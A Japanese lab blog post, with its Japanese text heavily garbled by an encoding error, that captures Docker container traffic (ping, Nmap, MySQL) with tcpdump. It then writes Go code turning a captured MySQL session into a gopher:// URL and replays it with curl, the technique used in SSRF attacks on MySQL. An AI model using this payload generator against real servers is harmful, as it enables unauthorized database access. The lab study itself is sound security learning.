docker間通信をtcpdumpã—ã¦pcapã‚’ã„ã˜ã‚‹
IPFactory Advent Calendar 2019 14日目ã®äºˆå®šã ã£ãŸãŒç¹°ã‚Šä¸Šã’ã¦6日目(ã«ä»£æ‰“投稿).
IPFactory 3å¹´ azaraã§ã™
自分ã§æ„図ã—ã¦ä½œã£ãŸãƒ‘ケットを見ãŸã„ã®ã¨CTF Writeupã§è¦‹ãŸæ”»æ’ƒæ‰‹æ³•ã§é¢ç™½ãã†ã ã£ãŸGopherプãƒãƒˆã‚³ãƒ«ã§MySQLå©ã„ã¦ã¿ã‚‹ã¨è¨€ã†ã®ã‚’試ã—ã¦ã¿ãŸã‹ã£ãŸã®ã§ã“ã®æ©Ÿã«ã‚„ã£ã¦ã¿ã‚‹ã€‚
å‰ææƒ…å ±
| å称 | ãƒãƒ¼ã‚¸ãƒ§ãƒ³ |
|---|---|
| macOS | Catalina 10.15.1 |
| Docker | version 19.03.5, build 633a0ea |
| Go | Docker golang:latest |
目次
- å‰ææƒ…å ±
- 目次
- ã„ã‚ã‚“ãªé€šä¿¡ã‚’眺ã‚ã‚‹
- Goã§Gopherプãƒãƒˆã‚³ãƒ«ã‚’æµã™ã‚³ãƒ¼ãƒ‰ã‚’書ã
ã„ã‚ã‚“ãªé€šä¿¡ã‚’眺ã‚ã‚‹
準備
ã¾ãšã¯docker-compose,client/Dockefile,app/Dockefileを書ã„ã¦ã„ã。å„個人ã§golangã®å…¥ã£ãŸappã¨clientを用æ„ã—ã¦ã‚‚らã£ã¦ã€MySQLを用æ„ã—ã¦ã‚‚らãˆã‚Œã°ã„ã„ã§ã™ã€‚
僕ãŒä½¿ã£ãŸã®ã¯ã“ã¡ã‚‰
File構é€
. ├── app │ ├── Dockerfile │ └── src ├── cap ├── client │ ├── Dockerfile │ └── src ├── db └── docker-compose.yml
docker networkã®ä½œæˆ
dockerã®IP固定ã®ãŸã‚ã«DockerNetworkを作æˆ
docker network create \ --subnet 192.168.208.0/24 \ --gateway 192.168.208.254 \ docker-pcap
docker-compose.yml
version: "3"
services:
db:
image: mysql:5.7
container_name: mysqlhost
networks:
docker-pcap:
ipv4_address: 192.168.208.2
environment:
MYSQL_ROOT_PASSWORD: root
MYSQL_DATABASE: test_database
MYSQL_USER: docker
MYSQL_PASSWORD: docker
TZ: "Asia/Tokyo"
command: mysqld --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci
volumes:
- ./docker/db/data:/var/lib/mysql
- ./docker/db/my.cnf:/etc/mysql/conf.d/my.cnf
- ./docker/db/sql:/docker-entrypoint-initdb.d
ports:
- 3306:3306
client:
restart: always
container_name: "client"
build: ./client
tty: true
networks:
docker-pcap:
ipv4_address: 192.168.208.3
command: tcpdump -i eth0 -X -s 0 -w /tmp/cap/client.pcap
links:
- db:mysqlhost
volumes:
- ./cap/:/tmp/cap
app:
restart: always
build: ./app
container_name: "app"
working_dir: "/root/"
ports:
- 80:80
tty: true
networks:
docker-pcap:
ipv4_address: 192.168.208.4
command: tcpdump -i eth0 -X -s 0 -w /tmp/cap/app.pcap
volumes:
- ./cap/:/tmp/cap
networks:
docker-pcap:
external:
name: docker-pcap
client/Dockerfile
FROM golang:latest
RUN apt update
RUN apt -y install locales && \
localedef -f UTF-8 -i ja_JP ja_JP.UTF-8
ENV LANG ja_JP.UTF-8
ENV LANGUAGE ja_JP:ja
ENV LC_ALL ja_JP.UTF-8
ENV TZ JST-9
ENV TERM xterm
RUN apt install -y nmap curl git wget tcpdump ltrace strace
COPY ./src /go/src/app
WORKDIR /go/src/app
RUN go get github.com/go-sql-driver/mysql
RUN go build .
app/Dockerfile
FROM golang:latest
RUN apt-get update
RUN apt-get -y install locales && \
localedef -f UTF-8 -i ja_JP ja_JP.UTF-8
ENV LANG ja_JP.UTF-8
ENV LANGUAGE ja_JP:ja
ENV LC_ALL ja_JP.UTF-8
ENV TZ JST-9
ENV TERM xterm
RUN apt update -y && apt upgrade -y && apt install -y tcpdump
COPY ./src /go/src/app
WORKDIR /go/src/app
Pingを眺ã‚ã‚‹
ã“ã“ã¾ã§ããŸã‚‰docker-compose up -dã§appã¨clientを実行ã—ã¦ç–Žé€šç¢ºèªã‚’ã—ã¦ã„ã。
å„IPã®å¯¾å¿œè¡¨
| name | IP |
|---|---|
| mysqlhost(db) | 192.168.208.2 |
| client | 192.168.208.3 |
| app | 192.168.208.4 |
⯠docker-compose exec client ping 192.168.208.4 -c 5 PING 192.168.208.4 (192.168.208.4) 56(84) bytes of data. 64 bytes from 192.168.208.4: icmp_seq=1 ttl=64 time=0.259 ms 64 bytes from 192.168.208.4: icmp_seq=2 ttl=64 time=0.118 ms 64 bytes from 192.168.208.4: icmp_seq=3 ttl=64 time=0.141 ms 64 bytes from 192.168.208.4: icmp_seq=4 ttl=64 time=0.121 ms 64 bytes from 192.168.208.4: icmp_seq=5 ttl=64 time=0.119 ms --- 192.168.208.4 ping statistics --- 5 packets transmitted, 5 received, 0% packet loss, time 4162ms rtt min/avg/max/mdev = 0.118/0.151/0.259/0.056 ms
疎通ã®ç¢ºèªãŒã§ããŸã®ã§ã€docker-compose stopã§ã‚µãƒ¼ãƒãƒ¼ã‚’æ¢ã‚ã‚ャプãƒãƒ£çµæžœã‚’見ã¦ã¿ã‚ˆã†ã€‚
èµ¤æž ã§å›²ã£ãŸç®‡æ‰€ãŒä»Šå›žé€ã£ãŸpingã®ç¯„囲。
普段疎通確èªç¨‹åº¦ã§ã—ã‹pingã‚’é€ã£ã¦ã„ãªã‹ã£ãŸãŒè©³ã—ã見ã¦ã¿ã‚‹ã¨dataãŒé€ã‚Œã‚‹ã‚ˆã†ã ã£ãŸã®ã§è©¦ã—ã«é€ã£ã¦ã¿ã‚ˆã†ã¨æ€ã†ã€‚
pin data
ã“ã“ã§ã‚ャプãƒãƒ£ã—ãŸpcapã¯(app|client)_ping.pcapã¨ã—ã¦ä¿å˜ã—ã¦ãŠã。
実際ã«é€ã£ã¦ã¿ãŸ
#ã²ã¨ã¾ãšé©å½“ãªå€¤ã‚’pad-byte(-p)ã«è©°ã‚込む ⯠docker-compose exec client ping 192.168.208.4 -c 5 -p ff61ff62ff63ff65 PATTERN: 0xff61ff62ff63ff65 PING 192.168.208.4 (192.168.208.4) 56(84) bytes of data. 64 bytes from 192.168.208.4: icmp_seq=1 ttl=64 time=0.174 ms 64 bytes from 192.168.208.4: icmp_seq=2 ttl=64 time=0.127 ms 64 bytes from 192.168.208.4: icmp_seq=3 ttl=64 time=0.144 ms 64 bytes from 192.168.208.4: icmp_seq=4 ttl=64 time=0.155 ms 64 bytes from 192.168.208.4: icmp_seq=5 ttl=64 time=0.141 ms --- 192.168.208.4 ping statistics --- 5 packets transmitted, 5 received, 0% packet loss, time 4151ms rtt min/avg/max/mdev = 0.127/0.148/0.174/0.017 ms
ã™ã‚‹ã¨ãƒ‡ãƒ¼ã‚¿ã«ã¯æ¬¡ã®ã‚ˆã†ãªçµæžœãŒå‡ºã¦ãã‚‹
48bytesã«ãªã‚‹ã¾ã§ãƒ‘ターンã¨ã—ã¦è©°ã‚られãŸff61ff62ff63ff65ãŒç¢ºèªã§ãる。
次ã«packetsizeを大ããã—ã¦ã¿ãŸã‚‰ã©ã†ãªã‚‹ã®ã‹?ã¨æ€ã„投ã’ã¤ã‘ã¦ã¿ã‚‹ã€‚
⯠docker-compose exec client ping 192.168.208.4 -c 1 -s 65467 PING 192.168.208.4 (192.168.208.4) 65467(65495) bytes of data. 65475 bytes from 192.168.208.4: icmp_seq=1 ttl=64 time=2.82 ms --- 192.168.208.4 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 2.826/2.826/2.826/0.000 ms
IPv4ã‚’1514bytes(内dataã¯1480bytes)を連続ã—ã¦é€ã‚ŠICMP(echo request)を途ä¸ã§é€ã‚Šã€æœ€å¾Œã«ICMP(echo reply)ã‚’è¿”ã—ã¦ã„る。
pcap file
IPv4ã§é€ä¿¡ã•ã‚ŒãŸdata(一部抜粋)
データé€ä¿¡é–¢ä¿‚ã¯ã²ã¨ã¾ãšã“ã®ãらã„ã«ã—ã¦docker-compose stop && docker-compose rmを実行ã—ã¦ã‚³ãƒ³ãƒ†ãƒŠã‚’消ã—ã¦ãŠã。
Nmapã®ã‚¹ã‚ャンを眺ã‚ã‚‹
次ã¯Nmapを実行ã—ã¦ã©ã®ã‚ˆã†ãªå‹•ãã‚’ã—ã¦ã„ã‚‹ã‹ã¿ã¦ã„ã“ã†ã€‚
ã¯ã˜ã‚ã«ä¸€ã¤ã®ãƒãƒ¼ãƒˆã‚’スã‚ャンã—ã¦ã¿ã‚‹ã€‚
⯠dcexec client nmap -p 80 192.168.208.4 Starting Nmap 7.40 ( https://nmap.org ) at 2019-12-xx xx:xx UTC Nmap scan report for app.docker-pcap (192.168.208.4) Host is up (0.00016s latency). PORT STATE SERVICE 80/tcp closed http MAC Address: 02:42:C0:A8:D0:04 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 0.73 seconds
ãƒãƒ¼ãƒˆãŒå˜ä½“ã®å ´åˆã¯ARPã‚’æµã—ã¦ã€äºŒåº¦80番ãƒãƒ¼ãƒˆã«ã‚¹ã‚ャンをã‹ã‘ã¦ã„る。ãªãœäºŒåº¦ãƒãƒ¼ãƒˆã‚¹ã‚ャンをã—ã¦ã„ã‚‹ã®ã‹ã€æ¤œè¨¼ã¯å¾Œæ—¥ã«ã™ã‚‹ã€‚
ãã‚Œã§ã¯80ã¨443をスã‚ャンã—ãŸå ´åˆã©ã†ãªã‚‹ã®ã‹ï¼Ÿ
⯠dcexec client nmap -p 80,443 192.168.208.4 Starting Nmap 7.40 ( https://nmap.org ) at 2019-12-xx xx:xx UTC Nmap scan report for app.docker-pcap (192.168.208.4) Host is up (0.00014s latency). PORT STATE SERVICE 80/tcp closed http 443/tcp closed https MAC Address: 02:42:C0:A8:D0:04 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
2ã¤ã®å ´åˆã¯ä¸€ã¤ä¸€ã¤ã®ãƒãƒ¼ãƒˆã«æµã—込んã§ã„る。
ã“ã“ã§å–å¾—ã—ãŸpcapã¯(app|client)_nmap80,443.pcap
次ã«1-10ã®10個ã®ãƒãƒ¼ãƒˆã«å¯¾ã—ã¦ã‚¹ã‚ャンをã—ã¦ã„ã。
⯠dcexec client nmap -p 1-10 192.168.208.4 Starting Nmap 7.40 ( https://nmap.org ) at 2019-12-xx xx:xx UTC Nmap scan report for app.docker-pcap (192.168.208.4) Host is up (0.000085s latency). PORT STATE SERVICE 1/tcp closed tcpmux 2/tcp closed compressnet 3/tcp closed compressnet 4/tcp closed unknown 5/tcp closed rje 6/tcp closed unknown 7/tcp closed echo 8/tcp closed unknown 9/tcp closed discard 10/tcp closed unknown MAC Address: 02:42:C0:A8:D0:04 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
ä¸è¦å‰‡ãªé †åºã§ãƒãƒ¼ãƒˆã‚¹ã‚ャンをã—ã¦ã„る。
ä¸è¦å‰‡ãªé †åºã«ã—ãªã„å ´åˆã¯-rã‚’ã¤ã‘ã‚‹ã“ã¨ã§è§£æ±ºã•ã‚Œã‚‹ã€‚
⯠dcexec client nmap -r -p 1-10 192.168.208.4 ~~略~~ Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
次ã«-Aã‚’ã¤ã‘ã¦æ¤œæŸ»ã‚’ã™ã‚‹ã€‚
⯠dcexec client nmap -A 192.168.208.4 Starting Nmap 7.40 ( https://nmap.org ) at 2019-12-xx xx:xx UTC Nmap scan report for app.docker-pcap (192.168.208.4) Host is up (0.00013s latency). All 1000 scanned ports on app.docker-pcap (192.168.208.4) are closed MAC Address: 02:42:C0:A8:D0:04 (Unknown) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.13 ms app.docker-pcap (192.168.208.4) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 5.29 seconds
ã¯ã˜ã‚ã¯é€šå¸¸ã®ã‚¹ã‚ャンã®ã‚ˆã†ã«ãƒ©ãƒ³ãƒ€ãƒ ã«ãƒãƒ¼ãƒˆã‚’スã‚ャンã™ã‚‹ã€‚
ãƒãƒ¼ãƒˆã‚¹ã‚ャン終了後ã«1番ã«å¯¾ã—ã¦ä½•åº¦ã‹tcp通信ã®å†é€ã‚¿ã‚¤ãƒ アウト(TCP Retransmission)ã‚„é‡è¤‡ã—ãŸACK(TCP Dup ACK)ãŒå¸°ã£ã¦ãã¦ã„る。
MySQLã¨ã®ã‚„ã‚Šã¨ã‚Šã‚’眺ã‚ã‚‹
続ã„ã¦MySQLã®ã‚„ã‚Šã¨ã‚Šã‚’ã¿ã¦ã„ã。
client/src/main.go
package main import ( "database/sql" "log" _ "github.com/go-sql-driver/mysql" ) var ( dbms = "mysql" credential = "docker:docker" testuser = "test_user" access = "tcp(db:3306)" dbname = "test_database" ) func main() { mysqlaccess := fmt.Sprintf("%v@%v/%v", credential, access, dbname) db, err := sql.Open(dbms, mysqlaccess) if err != nil { panic(err) } err = db.Ping() if err != nil { panic(err) } defer db.Close() }
軽ãgoã§æŽ¥ç¶šç”¨ã®ã‚³ãƒ¼ãƒ‰ã‚’書ã„ã¦é€šä¿¡ã‚’見ã¦ã„ã。
docker-compose build docker-compose up -d docker-compose exec client ./app docker-compose stop docker-compose rm [y]
å…ˆã»ã©æ›¸ã„ãŸã‚³ãƒ¼ãƒ‰ã®ä¸ã§ã€Serverã«æŒ¨æ‹¶ -> login -> db ping -> quitã¨ã„ã†ä¸€é€£ã®æµã‚Œã‚’ã—ã¦ã„る。
3way hand shake
server greeting
MySQLプãƒãƒˆã‚³ãƒ«ã¯ã€ã¯ã˜ã‚ã«æ¬¡ã®ã‚ˆã†ãªæŒ¨æ‹¶ã‚’交ã‚ã—ã¾ã™ã€‚
今回ã®å ´åˆã¯ã€èªè¨¼æ–¹å¼ã¯mysql_native_passwordã§å„種saltãªã©ã‚’clientã«é€ã‚Šé€šä¿¡ã‚’始ã‚ã¾ã™ã€‚
Login Request
パスワードã¯å…ˆã»ã©å—ã‘å–ã£ãŸsaltを用ã„ãŸãƒãƒƒã‚·ãƒ¥ã‚’é€ä¿¡ã™ã‚‹ã€‚
コード内部ã§dbnameを指定ã—ã¦ã„ã‚‹ã®ã§ã€ä»Šå›žã¯Schemaã«åå‰ãŒå…¥ã£ã¦ã„る。
Response Ok & Ping & Quit
Request OK
検証ã—ãã®ãƒ¦ãƒ¼ã‚¶ãƒ¼ãŒæ£ã—ã„å ´åˆã¯ã“ã®ãƒ¡ãƒƒã‚»ãƒ¼ã‚¸ã‚’è¿”ã™ã€‚
Quit
ã“ã®MySQLプãƒãƒˆã‚³ãƒ«ã«ã®ã£ã¨ã£ã¦ã‚³ãƒžãƒ³ãƒ‰ã‚„MySQLã®æ“作をã™ã‚‹ã€‚
client/src/main.go
// ~~å‰ç•¥~~ if err != nil { panic(err) } err = db.Ping() if err != nil { panic(err) } _, err = db.Query("select @@version_comment limit 1") if err != nil { panic(err) } defer db.Close() }
Query
Response
ã“ã“ã§å–å¾—ã—ãŸpcapã‚’client_mysql.pcapã¨ã—ã¦ä¿å˜ã—ã¦ãŠã
Goã§Gopherプãƒãƒˆã‚³ãƒ«ã‚’æµã™ã‚³ãƒ¼ãƒ‰ã‚’書ã
使ã†ãƒ©ã‚¤ãƒ–ラリ㯠https://github.com/google/gopacket
ã¾ãšã¯æ‰‹å§‹ã‚ã«MySQLã®é€šä¿¡ã‚’Gopher schemaã«å¤‰æ›ã™ã‚‹ã‚³ãƒ¼ãƒ‰ã‚’書ã。
Gopher schemaã§é€šä¿¡ã‚’è¡Œã†å ´åˆgopher://host:port/_tcp stream(%Encoding)ã«ãªã‚‹ã®ã§ã“ã®å½¢å¼ã«æ•´å½¢ã—ãªã‘ã‚Œã°ã„ã‘ãªã„。
例: MySQLã®ã‚¯ãƒ©ã‚¤ã‚¢ãƒ³ãƒˆå´ã®TCPストリーãƒ
コードã«ã™ã‚‹ã¨ã“ã‚“ãªæ„Ÿã˜
src/main.go
package main import ( "fmt" "strings" "github.com/google/gopacket/layers" "github.com/google/gopacket" "github.com/google/gopacket/pcap" ) var ( pcapfile = "../cap/client_mysql.pcap" mysqlhost = "192.168.208.2" client = "192.168.208.3" ) func main() { pcaphandle, err := pcap.OpenOffline(pcapfile) if err != nil { panic(err) } defer pcaphandle.Close() packetSource := gopacket.NewPacketSource(pcaphandle, pcaphandle.LinkType()) //displayPacket(packetSource) convGopher(packetSource) } func convGopher(packetSource *gopacket.PacketSource) { var gopherpayload map[string]string gopherpayload = map[string]string{client: "", mysqlhost: ""} for packet := range packetSource.Packets() { ipv4l := packet.Layer(layers.LayerTypeIPv4) tl := packet.Layer(layers.LayerTypeTCP) ipv4, _ := ipv4l.(*layers.IPv4) if tl == nil || packet.ApplicationLayer() == nil { continue } tcp, _ := tl.(*layers.TCP) if tcp.FIN { break } if (client == ipv4.SrcIP.String() && mysqlhost == ipv4.DstIP.String()) || (mysqlhost == ipv4.SrcIP.String() && client == ipv4.DstIP.String()) { gopherpayload[ipv4.SrcIP.String()] += stringRawData(packet.ApplicationLayer().Payload(), "%", "") } } fmt.Printf("Gopher : \ngopher://%v:3306/_%v\n", mysqlhost, gopherpayload[client]) } func stringRawData(payload []byte, hexTop, joinString string) (raw string) { var hexs = make([]string, len(payload)) for i, v := range payload { hexs[i] = fmt.Sprintf("%s%02x", hexTop, v) } raw = strings.Join(hexs, joinString) return raw }
ã“ã®çŠ¶æ…‹ã§æŽ¥ç¶šè‡ªä½“ãŒå¯èƒ½ã‹ã‚’確ã‹ã‚ã¦ã¿ã‚‹ã€‚
⯠pwd /<file path>/docker-lab/src ⯠go run . Gopher : gopher://192.168.208.2:3306/_%60%00%00%01%8d%a2%0a%00%00%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%64%6f%63%6b%65%72%00%14%90%b0%54%24%db%5c%f1%d7%44%6e%bf%ca%7f%4e%cc%7b%06%2a%8c%3c%74%65%73%74%5f%64%61%74%61%62%61%73%65%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%01%00%00%00%0e%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31 ⯠docker-compose build && docker-compose up -d ~~ ä¸ç•¥~~ Successfully built 50d1b4d43281 Successfully tagged docker-ssrf_app:latest mysqlhost is up-to-date app is up-to-date client is up-to-date ⯠docker-compose exec client curl gopher://192.168.208.2:3306/_%60%00%00%01%8d%a2%0 a%00%00%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00% 00%00%64%6f%63%6b%65%72%00%14%90%b0%54%24%db%5c%f1%d7%44%6e%bf%ca%7f%4e%cc%7b%06%2a %8c%3c%74%65%73%74%5f%64%61%74%61%62%61%73%65%00%6d%79%73%71%6c%5f%6e%61%74%69%76%6 5%5f%70%61%73%73%77%6f%72%64%00%01%00%00%00%0e%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31 J 5.7.28dEX 5~|�����*[{g8+ubHmysql_native_passwordN�#28000Access denied for user 'docker'@'192.168.208.3' (using password: YES)
今回ã®å ´åˆMySQLã«ãƒ‘スワードãŒã‹ã‹ã£ã¦ã„ã‚‹ã®ã§ã€ãƒ‘スワードèªè¨¼ãƒ—ãƒã‚»ã‚¹ãŒæŒŸã¾ã‚Œã‚‹ã€‚
MySQLã®ãƒ‘スワードèªè¨¼ãƒ—ãƒã‚»ã‚¹ã¯æ¬¡ã®ã‚ˆã†ãªå½¢ã¨ãªã‚‹ã€‚
- サーãƒãƒ¼ã«æŒ¨æ‹¶
- ãƒãƒ£ãƒ¬ãƒ³ã‚¸ãƒ¬ã‚¹ãƒãƒ³ã‚¹ã®ãŸã‚ã®ã‚½ãƒ«ãƒˆã‚’é€ä¿¡
- クライアントã¯ãã®ã‚½ãƒ«ãƒˆã¨ãƒ‘スワードを元ã«ãƒ¬ã‚¹ãƒãƒ³ã‚¹ã‚’生æˆ
- レスãƒãƒ³ã‚¹ã‚’é€ä¿¡å¾Œã‹ã‚‰DBã®æ“作ãŒå¯èƒ½ã¨ãªã‚‹
ã“ã®å ´åˆMySQLã‚’éžå¯¾è©±å½¢å¼ã§å©ã„ã¦ã‚‚MySQLã¯å‹•ä½œã—ã¾ã›ã‚“。
次ã«ãƒ‘スワードãªã—ã§ã‚„ã£ã¦ã¿ã‚‹ã€‚
client/src/main.go
//~~~å‰ç•¥~~~ 20行目 mysqlaccess := fmt.Sprintf("%v@%v/%v", testuser, access, dbname) //~~~ä¸ç•¥~~~ 31行目ã‹ã‚‰ quitコマンドé€ä¿¡ã®ãŸã‚ rows, err := db.Query("select @@version_comment limit 1") if err != nil { panic(err) } err = rows.Close() if err != nil { panic(err) } //~~~後略~~~
実行
docker-compose build docker-compose up -d docker-compose exec db mysql -r -e "create user 'test_user'@'192.168.208.3';grant all on *.* to 'test_user'@'192.168.208.3';" test_database docker-compose exec client ./app docker-compose stop docker-compose rm [y]
次ã®ã“ã®pcapã‚’å…ƒã«gopherを生æˆã™ã‚‹ã€‚
⯠go run . Gopher : gopher://192.168.208.2:3306/_%4f%00%00%01%8d%a2%0a%00%00%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%65%73%74%5f%75%73%65%72%00%00%74%65%73%74%5f%64%61%74%61%62%61%73%65%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%01%00%00%00%0e%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%01%00%00%00%01
ãã®å¾Œå®Ÿè¡Œã‚’ã™ã‚‹ã¨æ¬¡ã®ã‚ˆã†ã«è¡¨ç¤ºã•ã‚Œã‚‹ã€‚
>
docker-compose build
docker-compose up -d
docker-compose exec client curl gopher://192.168.208.2:3306/_%4f%00%00%01%8d%a2%0a%00%00%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%65%73%74%5f%75%73%65%72%00%00%74%65%73%74%5f%64%61%74%61%62%61%73%65%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%01%00%00%00%0e%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%01%00%00%00%01
J
5.7.28~Sx.
n?m�����X06Qu;c<5mysql_native_password'def@@version_comment
-p��MySQL Community Server (GPL)�
>
docker-compose stop
docker-compose rm
[y]
dumpã—ãŸpcapを確èªã™ã‚‹ã¨å®Ÿéš›ã«MySQLプãƒãƒˆã‚³ãƒ«ã§é€šä¿¡ã‚’ã—ã¦ã„ã‚‹ã“ã¨ãŒã‚ã‹ã‚‹ã€‚
以上ï¼
å‚考
Docker doc
TCP Error
gopacketã§pcapã‚’èªã¿è¾¼ã‚€
gopacket
SSRF攻击MySQL
